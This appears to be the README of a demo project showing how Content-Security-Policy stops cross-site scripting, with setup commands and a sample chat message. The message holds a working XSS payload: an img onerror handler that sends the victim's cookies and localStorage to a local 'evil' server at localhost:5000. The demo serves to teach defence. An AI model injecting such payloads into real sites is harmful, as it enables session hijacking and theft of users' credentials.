Cross-site scripting demo to demonstrate Content-Security-Policy
Make sure you're using Node.js 10.x or greater.
Open a terminal and navigate to the project's root directory.
yarn install
yarn start:server
yarn start:client
yarn start:evil
How's it going? <img style="display:none;" src="http://url.to.file.which/not.exist" onerror="fetch('http://localhost:5000', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ localStorage: Object.entries(localStorage).map(e => `${e[0]}=${e[1]}`), cookies: document.cookie })}); alert(`I just stole your auth cookie ${document.cookie} and the contents of your localStorage ${Object.entries(localStorage).map(e => `${e[0]}=${e[1]}`)}`);">
evilServer.js
- You'll see both the sender (attacker) and recipient's cookies and localStorage have been stolen and logged!evilServer.js
reveals that the attacker didn't receive any information.